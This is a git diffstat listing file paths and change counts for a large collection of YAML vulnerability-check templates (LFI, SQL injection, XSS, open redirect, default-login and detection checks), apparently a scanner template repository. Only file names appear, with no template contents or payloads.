accent-microcomputers-lfi-17.yaml} | 0 .../ad-widget-lfi-124.yaml | 36 + .../advanced-access-manager-lfi-116.yaml | 14 +- .../amministrazione-aperta-lfi-303.yaml | 34 - .../amministrazione-aperta-lfi.yaml | 32 + .../apachesolrlfissrf.yaml | 53 +- .../asanhamayesh-lfi-553.yaml | 13 +- .../bems-api-lfi-707.yaml | 24 + ...api-lfi-711.yaml => bems-api-lfi-712.yaml} | 0 .../blue-ocean-excellence-lfi-758.yaml | 8 +- .../brandfolder-lfi-776.yaml | 35 + .../brandfolder-lfi-778.yaml | 20 +- .../bullwark-momentum-lfi-807.yaml | 14 +- .../bullwark-momentum-lfi.yaml | 33 + .../cab-fare-calculator-lfi-819.yaml | 9 +- .../cab-fare-calculator-lfi.yaml | 9 +- .../candidate-application-lfi-850.yaml | 24 - poc/local_file_inclusion/cherry-lfi-903.yaml | 11 +- .../{cherry-lfi-902.yaml => cherry-lfi.yaml} | 0 .../church-admin-lfi-912.yaml | 9 +- .../church-admin-lfi-914.yaml | 27 + ...rchope-lfi.yaml => churchope-lfi-915.yaml} | 0 .../churchope-lfi-916.yaml | 32 - ... => cs-cart-unauthenticated-lfi-1281.yaml} | 0 .../cs-cart-unauthenticated-lfi-1285.yaml | 7 +- .../db-backup-lfi-6774.yaml | 7 +- .../db-backup-lfi-6776.yaml | 11 +- .../diarise-theme-lfi-6990.yaml | 12 +- .../dicoogle-pacs-lfi-6993.yaml | 21 - .../dicoogle-pacs-lfi-6994.yaml | 10 +- .../dicoogle-pacs-lfi.yaml | 22 - poc/local_file_inclusion/eibiz-lfi-7185.yaml | 13 +- poc/local_file_inclusion/eibiz-lfi-7186.yaml | 13 +- .../elfinder-detect-7201.yaml | 12 +- .../elfinder-detect-7202.yaml | 15 +- .../elfinder-path-traversal-7203.yaml | 37 + .../generic-linux-lfi-7589.yaml | 13 +- .../generic-windows-lfi-7590.yaml | 3 + .../generic-windows-lfi-7591.yaml | 32 - .../generic-windows-lfi.yaml | 28 +- .../geovision-geowebserver-lfi-7596.yaml | 17 +- .../geovision-geowebserver-lfi-7597.yaml | 15 +- .../global-domains-lfi-7715.yaml | 13 +- .../global-domains-lfi.yaml | 21 - poc/local_file_inclusion/goip-1-lfi-7761.yaml | 9 +- poc/local_file_inclusion/goip-1-lfi-7764.yaml | 20 - .../groupoffice-lfi-7849.yaml | 19 + .../groupoffice-lfi-7850.yaml | 21 - .../groupoffice-lfi-7851.yaml | 6 +- poc/local_file_inclusion/gsoap-lfi.yaml | 24 - .../hb-audio-lfi-7911.yaml | 15 +- .../health-check-lfi-7921.yaml | 10 +- .../health-check-lfi-7922.yaml | 17 +- .../hide-security-enhancer-lfi-7951.yaml | 10 +- .../hide-security-enhancer-lfi-7952.yaml | 18 +- .../hrsale-unauthenticated-lfi-8039.yaml | 33 + .../hrsale-unauthenticated-lfi.yaml | 20 - .../huawei-hg255s-lfi-8059.yaml | 24 +- .../huawei-hg255s-lfi-8060.yaml | 13 +- .../huawei-hg659-lfi-8070.yaml | 21 + .../ibm-infoprint-lfi-8105.yaml | 25 +- .../issuu-panel-lfi-8200.yaml | 18 +- poc/local_file_inclusion/issuu-panel-lfi.yaml | 20 + poc/local_file_inclusion/jeewms-lfi-8253.yaml | 15 +- poc/local_file_inclusion/jeewms-lfi-8254.yaml | 15 +- .../jinfornet-jreport-lfi-8307.yaml | 19 - .../jinfornet-jreport-lfi.yaml | 14 +- .../jolokia-unauthenticated-lfi-8364.yaml | 2 +- .../jolokia-unauthenticated-lfi.yaml | 26 - .../joomla-com-fabrik-lfi-8370.yaml | 16 +- .../joomla-com-fabrik-lfi-8373.yaml | 23 +- .../karel-ip-phone-lfi-8436.yaml | 9 +- .../karel-ip-phone-lfi-8438.yaml | 28 + .../kyocera-m2035dn-lfi-8558.yaml | 14 +- .../kyocera-m2035dn-lfi-8559.yaml | 14 +- .../laravel-filemanager-lfi-8587.yaml | 6 +- ...yaml => laravel-filemanager-lfi-8588.yaml} | 0 poc/local_file_inclusion/lfi-linux-fuzz.yaml | 78 + poc/local_file_inclusion/linux-lfi-fuzz.yaml | 30 +- ...0xlfifuzz1.yaml => linux-lfi-fuzzing.yaml} | 0 .../magicflow-lfi-8710.yaml | 8 +- poc/local_file_inclusion/magicflow-lfi.yaml | 21 + .../metinfo-lfi-8839.yaml | 22 +- .../metinfo-lfi-8841.yaml | 8 +- .../minimouse-lfi-8880.yaml | 8 +- .../minimouse-lfi-8881.yaml | 17 +- ....yaml => moodle-filter-jmol-lfi-8937.yaml} | 0 poc/local_file_inclusion/mpsec-lfi-8956.yaml | 14 +- poc/local_file_inclusion/mpsec-lfi-8957.yaml | 10 +- .../mthemeunus-lfi-8971.yaml | 25 - poc/local_file_inclusion/mthemeunus-lfi.yaml | 10 +- .../oliver-library-lfi-9239.yaml | 13 +- .../oliver-library-lfi.yaml | 22 - .../opensis-lfi-9317.yaml | 8 +- poc/local_file_inclusion/opensis-lfi.yaml | 22 + .../oracle-fatwire-lfi-9378.yaml | 7 +- .../oracle-fatwire-lfi-9380.yaml | 15 +- .../orbiteam-bscw-server-lfi-9404.yaml | 33 - .../orbiteam-bscw-server-lfi.yaml | 12 +- .../pacsone-server-lfi-9428.yaml | 20 - .../phpwiki-lfi-9568.yaml | 8 +- poc/local_file_inclusion/phpwiki-lfi.yaml | 21 - .../processmaker-lfi.yaml | 10 +- .../qihang-media-lfi-9769.yaml | 44 - .../qihang-media-lfi.yaml | 37 + .../ruijie-networks-lfi-9940.yaml | 7 +- .../ruijie-networks-lfi-9941.yaml | 11 +- .../samsung-wlan-ap-lfi-9997.yaml | 21 +- .../shortcode-lfi-10216.yaml | 14 +- poc/local_file_inclusion/shortcode-lfi.yaml | 26 + .../simple-image-manipulator-lfi-10281.yaml | 7 +- .../simple-image-manipulator-lfi-10282.yaml | 25 - .../sl-studio-lfi-10320.yaml | 18 +- .../sniplets-lfi-10343.yaml | 34 + poc/local_file_inclusion/sniplets-lfi.yaml | 15 +- .../surrealtodo-lfi-10580.yaml | 7 +- poc/local_file_inclusion/surrealtodo-lfi.yaml | 30 + .../thinkcmf-lfi-10724.yaml | 24 + poc/local_file_inclusion/thinkcmf-lfi.yaml | 29 + .../vmware-vcenter-lfi-linux-11042.yaml | 14 - .../vmware-vcenter-lfi-linux-11044.yaml | 26 +- .../vmware-vcenter-lfi.yaml | 34 - .../wordpress-lfi(1).yaml | 25 + .../wordpress-wordfence-lfi-11348.yaml | 19 +- .../wordpress-wordfence-lfi-11350.yaml | 4 + .../wordpress-wordfence-lfi-11351.yaml | 25 - .../wp-javospot-lfi-11480.yaml | 12 +- .../wp-javospot-lfi-11482.yaml | 14 +- ...p-memphis-documents-library-lfi-11495.yaml | 26 + ...p-memphis-documents-library-lfi-11497.yaml | 14 +- ...p-memphis-documents-library-lfi-11498.yaml | 26 - ...p-memphis-documents-library-lfi-11499.yaml | 4 - .../wp-oxygen-theme-lfi-11519.yaml | 22 +- ...fi-11523.yaml => wp-oxygen-theme-lfi.yaml} | 0 .../wp-simple-fields-lfi-11568.yaml | 14 +- ...i.yaml => wp-simple-fields-lfi-11571.yaml} | 0 .../wp-socialfit-xss-11577.yaml | 27 - poc/local_file_inclusion/wp-tinymce-lfi.yaml | 10 +- .../wp-tutor-lfi-11598.yaml | 17 + ...tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} | 0 .../wp-vault-lfi-11608.yaml | 19 +- .../wp-vault-lfi-11609.yaml | 14 +- .../wp-vault-lfi-11611.yaml | 19 + .../xerox-efi-lfi-11682.yaml | 23 + .../xerox-efi-lfi-11683.yaml | 28 - poc/local_file_inclusion/xerox-efi-lfi.yaml | 7 +- .../yishaadmin-lfi-11743.yaml | 2 +- poc/local_file_inclusion/yishaadmin-lfi.yaml | 23 - poc/magento/magento-2-exposed-api-8687.yaml | 21 +- poc/magento/magento-2-exposed-api-8688.yaml | 9 +- poc/magento/magento-admin-panel-8690.yaml | 21 + poc/magento/magento-admin-panel-8693.yaml | 19 +- poc/magento/magento-admin-panel.yaml | 37 +- ...eleak.yaml => magento-cacheleak-8698.yaml} | 0 poc/magento/magento-cacheleak-8699.yaml | 13 +- poc/magento/magento-config-8702.yaml | 26 + poc/magento/magento-config-8703.yaml | 9 +- poc/magento/magento-config-disclosure.yaml | 50 - poc/magento/magento-detect-8706.yaml | 8 +- poc/magento/magento-detect-8707.yaml | 6 +- .../magento-unprotected-dev-files-8708.yaml | 31 - .../magento-unprotected-dev-files.yaml | 3 +- poc/microsoft/74cms-sqli-10.yaml | 17 - poc/microsoft/74cms-sqli-9.yaml | 7 +- .../aims-password-mgmt-client-218.yaml | 27 + .../aims-password-mgmt-client-219.yaml | 17 + .../aims-password-mgmt-client-221.yaml | 17 - poc/microsoft/aims-password-mgmt-client.yaml | 2 +- poc/microsoft/aims-password-portal-222.yaml | 32 - poc/microsoft/aims-password-portal-224.yaml | 14 +- poc/microsoft/api-buttercms.yaml | 19 + poc/microsoft/bems-api-lfi-707.yaml | 24 + ...api-lfi-711.yaml => bems-api-lfi-712.yaml} | 0 poc/microsoft/bolt-cms-panel.yaml | 14 +- poc/microsoft/buttercms.yaml | 25 +- poc/microsoft/call-break-cms.yaml | 45 +- poc/microsoft/chamilo-lms-sqli-892.yaml | 2 +- poc/microsoft/cisco-systems-login-975.yaml | 15 +- poc/microsoft/cisco-systems-login.yaml | 27 +- poc/microsoft/craft-cms-detect-1247.yaml | 11 +- poc/microsoft/craft-cms-detect-1248.yaml | 28 - poc/microsoft/craftcms-admin-panel.yaml | 25 +- .../dahua-wpms-addimgico-fileupload.yaml | 78 +- ...dedecms-carbuyaction-fileinclude-6792.yaml | 1 - .../dedecms-carbuyaction-fileinclude.yaml | 29 + .../dedecms-membergroup-sqli-6796.yaml | 20 - .../dedecms-membergroup-sqli-6799.yaml | 10 +- poc/microsoft/dedecms-openredirect-6800.yaml | 4 +- .../default-microsoft-azure-page-6873.yaml | 5 +- .../default-microsoft-azure-page.yaml | 17 - poc/microsoft/dotcms-admin-panel-7085.yaml | 18 - poc/microsoft/dotcms-admin-panel-7087.yaml | 18 + .../duomicms-sql-injection-7122.yaml | 21 + .../duomicms-sql-injection-7125.yaml | 11 +- .../dzs-zoomsounds-listing-7149.yaml | 4 +- poc/microsoft/dzs-zoomsounds-listing.yaml | 20 + ...recms-xss.yaml => empirecms-xss-7218.yaml} | 0 poc/microsoft/empirecms-xss-7220.yaml | 25 - poc/microsoft/ems-login-panel-7223.yaml | 6 +- poc/microsoft/ems-login-panel.yaml | 17 +- poc/microsoft/feifeicms-lfr-7464.yaml | 13 +- poc/microsoft/feifeicms-lfr.yaml | 26 - ...n.yaml => fuelcms-default-login-7571.yaml} | 0 poc/microsoft/fuelcms-default-login-7572.yaml | 48 - poc/microsoft/getsimple-cms-detect-7614.yaml | 11 +- poc/microsoft/getsimple-cms-detect-7615.yaml | 9 +- .../getsimple-cms-detector-7613.yaml | 22 - poc/microsoft/getsimple-cms-detector.yaml | 44 +- poc/microsoft/grav-cms-detect-7843.yaml | 31 + ...-detect.yaml => grav-cms-detect-7844.yaml} | 0 poc/microsoft/jeewms-lfi-8253.yaml | 15 +- poc/microsoft/jeewms-lfi-8254.yaml | 15 +- .../kevinlab-bems-backdoor-8455.yaml | 11 +- poc/microsoft/kevinlab-bems-sqli-8460.yaml | 42 + poc/microsoft/kevinlab-bems-sqli.yaml | 33 - .../kevinlab-hems-backdoor-8463.yaml | 29 +- .../kevinlab-hems-backdoor-8467.yaml | 10 +- poc/microsoft/kiwitcms-login-8496.yaml | 26 + poc/microsoft/kiwitcms-login-8497.yaml | 23 - poc/microsoft/kiwitcms-login.yaml | 16 +- poc/microsoft/lotuscms-rce-8651.yaml | 3 +- ...s-rce-8652.yaml => lotuscms-rce-8653.yaml} | 0 poc/microsoft/maccmsv10-backdoor-8683.yaml | 34 + poc/microsoft/maccmsv10-backdoor-8685.yaml | 19 +- poc/microsoft/metatag-cms-8832.yaml | 17 +- poc/microsoft/metatag-cms-8833.yaml | 14 +- .../microsoft-exchange-control-panel.yaml | 6 +- poc/microsoft/microsoft-exchange-panel.yaml | 21 +- ...microsoft-exchange-server-detect-8853.yaml | 33 + .../microsoft-teams-webhook-8858.yaml | 15 + ...8856.yaml => microsoft-teams-webhook.yaml} | 0 poc/microsoft/ms-adcs-detect-8960.yaml | 24 - poc/microsoft/ms-adcs-detect-8961.yaml | 29 + poc/microsoft/ms-adcs-detect.yaml | 7 +- ...ms-exchange-server-reflected-xss-8962.yaml | 27 + ...ms-exchange-server-reflected-xss-8964.yaml | 8 +- poc/microsoft/msmtp-config-8966.yaml | 12 +- poc/microsoft/msmtp-config-8967.yaml | 16 +- poc/microsoft/msvod-sqli.yaml | 2 + poc/microsoft/myucms-lfr-8984.yaml | 7 +- poc/microsoft/myucms-lfr-8986.yaml | 3 +- poc/microsoft/myucms-lfr-8987.yaml | 16 + poc/microsoft/netlify-cms-9039.yaml | 19 - poc/microsoft/netlify-cms-9041.yaml | 19 + poc/microsoft/netlify-cms.yaml | 2 +- .../octobercms-default-login-9192.yaml | 59 + ...193.yaml => octobercms-default-login.yaml} | 0 poc/microsoft/octobercms-detect-9196.yaml | 3 +- poc/microsoft/odoo-cms-redirect-9199.yaml | 8 +- poc/microsoft/odoo-cms-redirect.yaml | 19 - poc/microsoft/opennms-web-console-9287.yaml | 3 +- poc/microsoft/opennms-web-console.yaml | 22 +- .../pbootcms-database-file-download-9469.yaml | 29 - .../pbootcms-database-file-download.yaml | 20 +- poc/microsoft/powercreator-cms-rce-9643.yaml | 4 + poc/microsoft/powercreator-cms-rce-9644.yaml | 50 + poc/microsoft/powercreator-cms-rce-9646.yaml | 40 - poc/microsoft/reflected-params.yaml | 339 +- poc/microsoft/rhymix-cms-detect-9878.yaml | 22 - ...etect.yaml => rhymix-cms-detect-9879.yaml} | 0 poc/microsoft/saferoads-vms-login-9970.yaml | 15 - poc/microsoft/saferoads-vms-login-9973.yaml | 16 + poc/microsoft/saferoads-vms-login-9974.yaml | 5 +- poc/microsoft/samsung-printer-detect.yaml | 22 +- poc/microsoft/samsung-wlan-ap-lfi-9997.yaml | 21 +- poc/microsoft/samsung-wlan-ap-rce-10007.yaml | 16 +- ...ce-10009.yaml => samsung-wlan-ap-rce.yaml} | 0 .../samsung-wlan-default-login-10015.yaml | 9 +- .../samsung-wlan-default-login-10017.yaml | 3 +- poc/microsoft/seacms-rce-10100.yaml | 23 +- poc/microsoft/seacms-rce-10101.yaml | 3 +- .../seeddms-default-login-10127.yaml | 20 +- .../seeddms-default-login-10128.yaml | 23 +- poc/microsoft/strapi-cms-detect-10539.yaml | 3 +- poc/microsoft/strapi-cms-detect.yaml | 31 - poc/microsoft/tikiwiki-cms-10774.yaml | 23 + poc/microsoft/top-xss-params-10807.yaml | 2 +- poc/microsoft/top-xss-params-10809.yaml | 81 - poc/microsoft/vpms-auth-bypass-11066.yaml | 33 - poc/microsoft/vpms-auth-bypass-11068.yaml | 3 +- poc/microsoft/vpms-auth-bypass.yaml | 29 +- ...11192.yaml => wems-manager-xss-11194.yaml} | 0 poc/microsoft/wems-manager-xss.yaml | 26 - poc/microsoft/wondercms-detect-11223.yaml | 21 + ...etect-11222.yaml => wondercms-detect.yaml} | 0 poc/microsoft/wp-arforms-listing-11415.yaml | 22 - poc/microsoft/wp-arforms-listing-11418.yaml | 22 + poc/microsoft/wp-arforms-listing.yaml | 2 +- poc/microsoft/wp-mstore-plugin-listing.yaml | 23 - poc/microsoft/wp-plugin-lifterlms-11536.yaml | 22 - poc/microsoft/wp-plugin-lifterlms.yaml | 4 +- poc/microsoft/wp-sfwd-lms-listing-11562.yaml | 22 + poc/microsoft/wp-sfwd-lms-listing-11564.yaml | 17 +- poc/microsoft/wuzhicms-detect-11655.yaml | 20 +- poc/microsoft/wuzhicms-detect.yaml | 24 - poc/microsoft/wuzhicms-sqli-11656.yaml | 41 - poc/microsoft/xdcms-sqli-11664.yaml | 30 - poc/microsoft/xdcms-sqli-11667.yaml | 11 +- poc/microsoft/xdcms-sqli.yaml | 31 - poc/microsoft/zcms-v3-sqli-11773.yaml | 21 - poc/microsoft/zcms-v3-sqli-11775.yaml | 14 +- poc/microsoft/zhixiangOA-msglog.aspx-sql.yaml | 4 +- ...-11830.yaml => zms-auth-bypass-11832.yaml} | 0 poc/microsoft/zms-auth-bypass.yaml | 26 +- .../alibaba-mongoshake-unauth-268.yaml | 27 + .../alibaba-mongoshake-unauth-270.yaml | 10 +- poc/mongodb/mongodb-ops-manager-8922.yaml | 20 - poc/mongodb/mongodb-unauth-8928.yaml | 4 +- poc/mongodb/mongodb-unauth.yaml | 26 - poc/mongodb/robomongo-credential.yaml | 22 +- .../rockmongo-default-credentials.yaml | 5 + poc/mongodb/rockmongo-default-login-9899.yaml | 15 +- poc/mongodb/rockmongo-default-login.yaml | 41 - poc/mongodb/rockmongo-xss-9901.yaml | 27 +- poc/mongodb/rockmongo-xss-9902.yaml | 28 - .../unauthenticated-mongo-express-10909.yaml | 8 +- .../unauthenticated-mongo-express-10911.yaml | 26 + poc/mysql/exposed-mysql-initial-7322.yaml | 7 +- poc/mysql/exposed-mysql-initial.yaml | 21 - poc/netlify/netlify-cms-9039.yaml | 19 - poc/netlify/netlify-cms-9041.yaml | 19 + poc/netlify/netlify-cms.yaml | 2 +- poc/nginx/default-nginx-page-6880.yaml | 18 + poc/nginx/default-nginx-page.yaml | 5 +- .../git-config-nginxoffbyslash-7628.yaml | 38 + .../git-config-nginxoffbyslash-7632.yaml | 21 +- ...inx-config.yaml => nginx-config-9097.yaml} | 0 poc/nginx/nginx-config-9098.yaml | 21 - poc/nginx/nginx-config-9099.yaml | 10 +- poc/nginx/nginx-linux-page-9101.yaml | 3 +- poc/nginx/nginx-linux-page-9102.yaml | 17 + ...inx-merge-slashes-path-traversal-9105.yaml | 34 + .../nginx-merge-slashes-path-traversal.yaml | 28 - poc/nginx/nginx-module-vts-xss-9106.yaml | 49 +- poc/nginx/nginx-module-vts-xss-9108.yaml | 9 +- poc/nginx/nginx-module-vts-xss-9109.yaml | 23 + poc/nginx/nginx-proxy-manager-9114.yaml | 3 +- poc/nginx/nginx-status-9115.yaml | 14 +- poc/nginx/nginx-status-9118.yaml | 15 +- .../nginx-vhost-traffic-status-9124.yaml | 13 +- poc/nodejs/api-npm.yaml | 22 - poc/nodejs/express-lfr (copy 1).yaml | 40 + poc/nodejs/express-lfr-json.yaml | 4 +- poc/nodejs/gradle-cache-node-detect-7798.yaml | 21 + poc/nodejs/kube-api-nodes-8508.yaml | 23 +- poc/nodejs/lfr_express.yaml | 38 + ...aml => node-integration-enabled-9137.yaml} | 0 poc/nodejs/node-integration-enabled.yaml | 3 +- poc/nodejs/node-red-detect-9139.yaml | 32 + poc/nodejs/node-red-detect.yaml | 19 - poc/nodejs/npm.yaml | 16 +- .../unauthenticated-mongo-express-10909.yaml | 8 +- .../unauthenticated-mongo-express-10911.yaml | 26 + ...zed-puppet-node-manager-detect-10959.yaml} | 0 ...authorized-puppet-node-manager-detect.yaml | 9 +- .../aspnuke-openredirect-554.yaml | 7 +- .../aspnuke-openredirect-556.yaml | 18 - ...ect.yaml => aspnuke-openredirect-557.yaml} | 0 .../attitude-theme-open-redirect-586.yaml | 20 - ... => attitude-theme-open-redirect-588.yaml} | 0 .../bitrix-open-redirect-743.yaml | 39 - .../bitrix-open-redirect-744.yaml | 40 + poc/open_redirect/bitrix-open-redirect.yaml | 3 +- .../brandfolder-open-redirect-780.yaml | 3 +- .../caddy-open-redirect-835.yaml | 7 +- .../caddy-open-redirect-836.yaml | 20 + .../caddy-open-redirect-837.yaml | 20 - poc/open_redirect/caddy-open-redirect.yaml | 3 +- .../dedecms-openredirect-6800.yaml | 4 +- .../drupal-user-enum-redirect-7112.yaml | 6 +- .../drupal-user-enum-redirect-7114.yaml | 33 - .../drupal-user-enum-redirect-7115.yaml | 31 + .../eatery-restaurant-open-redirect-7158.yaml | 28 +- .../eatery-restaurant-open-redirect-7160.yaml | 25 +- .../homeautomation-v3-openredirect-7982.yaml | 16 - .../homeautomation-v3-openredirect-7984.yaml | 10 +- .../httpbin-open-redirect-8047.yaml | 36 + poc/open_redirect/httpbin-open-redirect.yaml | 19 - .../netsweeper-open-redirect-9064.yaml | 20 +- .../netsweeper-open-redirect.yaml | 18 + ...newsletter-manager-open-redirect-9075.yaml | 4 +- .../newsletter-manager-open-redirect.yaml | 4 +- .../newsletter-open-redirect.yaml | 11 +- .../ninjaform-open-redirect-9133.yaml | 35 - .../ninjaform-open-redirect-9134.yaml | 4 - poc/open_redirect/odoo-cms-redirect-9199.yaml | 8 +- poc/open_redirect/odoo-cms-redirect.yaml | 19 - .../office365-open-redirect-9212.yaml | 25 +- .../office365-open-redirect-9215.yaml | 24 - poc/open_redirect/open-redirect-9308.yaml | 123 - poc/open_redirect/open-redirect-9312.yaml | 129 +- .../otobo-open-redirect-9411.yaml | 23 +- .../pieregister-open-redirect-9579.yaml | 28 + .../pieregister-open-redirect.yaml | 23 - .../pieregister-plugin-open-redirect.yaml | 19 - poc/open_redirect/pollbot-redirect-9622.yaml | 23 + poc/open_redirect/pollbot-redirect.yaml | 27 - poc/open_redirect/sap-redirect-10064.yaml | 29 - poc/open_redirect/sap-redirect-10067.yaml | 12 +- .../thinkific-redirect-10737.yaml | 5 +- ...ect-10732.yaml => thinkific-redirect.yaml} | 0 .../ultimatemember-open-redirect-10877.yaml | 18 - .../ultimatemember-open-redirect-10879.yaml | 6 +- ...ekender-newspaper-open-redirect-11186.yaml | 17 - ...ekender-newspaper-open-redirect-11188.yaml | 6 +- .../weekender-newspaper-open-redirect.yaml | 18 - ...ress-redirection-plugin-listing-11306.yaml | 22 - ...ess-redirection-plugin-listing-11308.yaml} | 0 .../wp-grimag-open-redirect-11461.yaml | 12 +- .../wp-grimag-open-redirect-11462.yaml | 18 + .../wp-gtranslate-open-redirect-11463.yaml | 21 +- .../wp-gtranslate-open-redirect-11465.yaml | 22 + .../wp-gtranslate-open-redirect-11466.yaml | 4 +- .../wp-prostore-open-redirect-11549.yaml | 14 +- .../wptouch-open-redirect-11592.yaml | 30 +- .../wptouch-open-redirect-11594.yaml | 4 +- .../wptouch-open-redirect-11595.yaml | 25 + .../wptouch-plugin-open-redirect.yaml | 13 +- poc/oracle/Oracle-OAM-XSS.yaml | 4 - .../default-oracle-application-page-6892.yaml | 3 +- .../default-oracle-application-page.yaml | 18 - poc/oracle/metadata-oracle-8830.yaml | 43 + poc/oracle/metadata-oracle-8831.yaml | 18 +- poc/oracle/oracle-business-control-9346.yaml | 24 + poc/oracle/oracle-dbass-detect-9350.yaml | 7 +- poc/oracle/oracle-dbass-detect-9351.yaml | 21 + poc/oracle/oracle-dbcs-9353.yaml | 8 +- poc/oracle/oracle-dbcs-9354.yaml | 7 +- ...oracle-ebs-bispgraph-file-access-9359.yaml | 28 - poc/oracle/oracle-ebs-credentials-9365.yaml | 28 - poc/oracle/oracle-ebs-credentials-9366.yaml | 28 + poc/oracle/oracle-ebs-credentials.yaml | 2 +- .../oracle-ebs-sqllog-disclosure-9370.yaml | 21 +- .../oracle-ebs-sqllog-disclosure-9371.yaml | 30 - poc/oracle/oracle-ebs-xss-9375.yaml | 12 +- poc/oracle/oracle-fatwire-lfi-9378.yaml | 7 +- poc/oracle/oracle-fatwire-lfi-9380.yaml | 15 +- poc/oracle/oracle-http-server-12c-9383.yaml | 4 +- poc/oracle/oracle-http-server-12c-9384.yaml | 3 +- poc/oracle/oracle-httpserver12c.yaml | 9 +- .../oracle-integrated-manager-9386.yaml | 26 - .../oracle-integrated-manager-9388.yaml | 4 +- .../oracle-iplanet-web-server-9393.yaml | 26 + poc/oracle/oracle-iplanet-web-server.yaml | 21 + poc/oracle/oracle-oam-xss.yaml | 24 - poc/oracle/oracle-people-enterprise-9396.yaml | 4 +- poc/oracle/oracle-people-enterprise.yaml | 20 +- poc/oracle/oracle-siebel-xss-9400.yaml | 25 +- poc/oracle/oracle-siebel-xss.yaml | 34 + poc/other/3g-wireless-gateway-5.yaml | 25 - poc/other/3g-wireless-gateway.yaml | 32 + poc/other/ATHD-DVR-fileRead.yaml | 4 +- poc/other/DIAOWEN-fileRead.yaml | 2 + poc/other/GLPIDirectoryListing.yaml | 23 +- poc/other/LayerSlider-plugin.yaml | 58 + poc/other/WSO2-2019-0598.yaml | 30 + poc/other/WSO2MgmtConsole.yaml | 4 + poc/other/Wireless-leakage.yaml | 6 +- poc/other/X-Remote-Addr.yaml | 19 - poc/other/X-Remote-IP.yaml | 19 - poc/other/access-log-21.yaml | 3 + poc/other/acrolinx-dashboard-36.yaml | 39 + poc/other/acrolinx-dashboard-37.yaml | 29 - poc/other/acunetix-panel-57.yaml | 12 +- poc/other/acunetix-panel-58.yaml | 23 + poc/other/acunetix-panel-59.yaml | 9 +- poc/other/adiscon-loganalyzer-67.yaml | 42 + poc/other/adiscon-loganalyzer-68.yaml | 29 - poc/other/adiscon-loganalyzer-70.yaml | 5 +- poc/other/adminer-panel-75.yaml | 27 +- poc/other/adminer-panel-76.yaml | 50 - poc/other/adminer-panel-77.yaml | 41 + poc/other/adminset-panel-78.yaml | 7 +- poc/other/adminset-panel-79.yaml | 34 + poc/other/adminset-panel-80.yaml | 28 - poc/other/adminset-panel.yaml | 16 +- poc/other/akamai-cloudtest-250.yaml | 34 - poc/other/akamai-cloudtest-253.yaml | 24 - poc/other/akamai-cloudtest.yaml | 13 +- poc/other/alibaba-canal-info-leak-264.yaml | 26 +- poc/other/alienvault-usm-271.yaml | 31 + ...vault-usm-272.yaml => alienvault-usm.yaml} | 0 poc/other/ampps-admin-panel-305.yaml | 5 + poc/other/ampps-admin-panel-306.yaml | 43 - poc/other/ampps-dirlisting-307.yaml | 29 + poc/other/ampps-dirlisting-308.yaml | 16 +- poc/other/ampps-panel-309.yaml | 14 +- poc/other/ampps-panel-311.yaml | 12 +- poc/other/antsword-backdoor-334.yaml | 12 +- poc/other/antsword-backdoor-335.yaml | 24 - poc/other/apc-info-378.yaml | 10 +- .../artifactory-anonymous-deploy-547.yaml | 24 - .../artifactory-anonymous-deploy-549.yaml | 30 + poc/other/asana.yaml | 27 +- poc/other/aspose-file-download.yaml | 27 + poc/other/aspose-pdf-file-download-566.yaml | 20 +- ...yaml => aspose-pdf-file-download-570.yaml} | 0 poc/other/aspose-words-file-download-571.yaml | 8 +- poc/other/aspose-words-file-download-572.yaml | 25 + poc/other/aspose-words-file-download-574.yaml | 8 +- poc/other/avantfax-panel-601.yaml | 7 +- poc/other/avantfax-panel-602.yaml | 9 + poc/other/aviatrix-panel-608.yaml | 40 + poc/other/aviatrix-panel-610.yaml | 31 - poc/other/avtech-avn801-camera-panel-611.yaml | 3 +- poc/other/avtech-avn801-camera-panel-612.yaml | 30 + poc/other/avtech-avn801-camera-panel-613.yaml | 32 - poc/other/axis-happyaxis-670.yaml | 36 + poc/other/{bitrix_bak_check.yaml => bak.yaml} | 0 poc/other/barracuda-panel-686.yaml | 4 +- poc/other/basic-cors-693.yaml | 16 + poc/other/basic-cors-694.yaml | 10 +- poc/other/bitrix-panel-748.yaml | 32 - poc/other/bitrix-panel-749.yaml | 7 +- poc/other/bitrix-panel-750.yaml | 27 + poc/other/bookstack-panel.yaml | 16 +- poc/other/buddy-panel-796.yaml | 30 + poc/other/buildkite.yaml | 25 +- poc/other/cacti-panel.yaml | 19 +- .../cacti-weathermap-file-write-831.yaml | 23 + .../cacti-weathermap-file-write-832.yaml | 4 + .../cacti-weathermap-file-write-833.yaml | 26 - poc/other/campaignmonitor-843.yaml | 17 + poc/other/campaignmonitor-844.yaml | 23 +- poc/other/can-i-take-over-dns-852.yaml | 140 - poc/other/cerebro-panel-879.yaml | 26 + poc/other/cerebro-panel-881.yaml | 27 - poc/other/cgi-printenv-885.yaml | 38 + poc/other/cgi-printenv.yaml | 29 - poc/other/cgi-test-page-888.yaml | 9 +- poc/other/chamilo.yaml | 24 +- poc/other/checkmarx-panel-895.yaml | 19 + poc/other/checkmarx-panel-897.yaml | 18 - poc/other/checkpoint-panel-899.yaml | 29 - poc/other/cherry-file-download-900.yaml | 37 + poc/other/cherry-file-download.yaml | 25 - poc/other/circarlife-setup-917.yaml | 2 +- poc/other/circarlife-setup-921.yaml | 2 +- ...aml => clearpass-policy-manager-1001.yaml} | 0 poc/other/clearpass-policy-manager-999.yaml | 47 +- poc/other/clientaccesspolicy-1006.yaml | 25 + poc/other/cloudinary.yaml | 15 +- poc/other/cloudphysician-radar.yaml | 20 +- poc/other/cname-fingerprint-1030.yaml | 30 + poc/other/codeigniter-env-1133.yaml | 38 + poc/other/codeigniter-env-1134.yaml | 31 - poc/other/cofense-vision-panel-1141.yaml | 3 +- poc/other/cold-fusion-cfcache-map-1149.yaml | 28 + poc/other/compal-panel.yaml | 15 +- poc/other/compal.yaml | 16 - poc/other/concourse-ci-panel-1169.yaml | 24 + poc/other/concrete5-panel-1172.yaml | 33 - poc/other/concrete5-panel-1173.yaml | 32 + poc/other/concrete5-panel.yaml | 15 +- poc/other/contacam-1197.yaml | 3 +- poc/other/content-scheme-1204.yaml | 16 + poc/other/content-scheme-1205.yaml | 1 - poc/other/content-scheme-1206.yaml | 16 - poc/other/crossdomain-xml-1269.yaml | 29 + poc/other/crossdomain-xml.yaml | 23 - ...d-panel-1286.yaml => csod-panel-1289.yaml} | 0 poc/other/cucm-username-enumeration.yaml | 8 +- poc/other/custom-solr-file-read.yaml | 29 +- poc/other/custom_nuclei-6.yaml | 70 +- poc/other/d-link-arbitary-fileread-7040.yaml | 17 +- poc/other/d-link-arbitary-fileread-7045.yaml | 26 - poc/other/d-link-arbitary-fileread-7046.yaml | 12 +- 